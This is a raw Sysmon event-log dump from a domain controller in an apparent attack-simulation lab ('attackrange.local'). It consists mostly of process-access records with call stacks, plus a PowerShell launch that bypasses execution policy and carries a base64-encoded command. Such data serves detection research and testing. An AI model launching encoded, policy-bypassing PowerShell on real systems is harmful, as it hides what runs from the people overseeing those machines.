10341000x8000000000000000359Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000358Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.305{5D479F2C-167A-5F84-0903-000000007E01}29844704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+365732ed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a14177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a13e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+364c54ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+359d49de(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a32ead(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a16512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a16512(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a163a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a08328(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a1485b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a1444e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a14177(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35a13e48(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+364c54ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+359faca9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+359fa279(wow64) 154100x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.315{5D479F2C-167A-5F84-0A03-000000007E01}1832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167A-5F84-77B4-110000000000}0x11b4770HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.259{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.259{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.227{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ryndf0ex.dl5.ps12020-10-12 08:40:26.227 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.212{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-167A-5F84-0703-000000007E01}50444736C:\Windows\system32\conhost.exe{5D479F2C-167A-5F84-0903-000000007E01}2984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:26.180{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 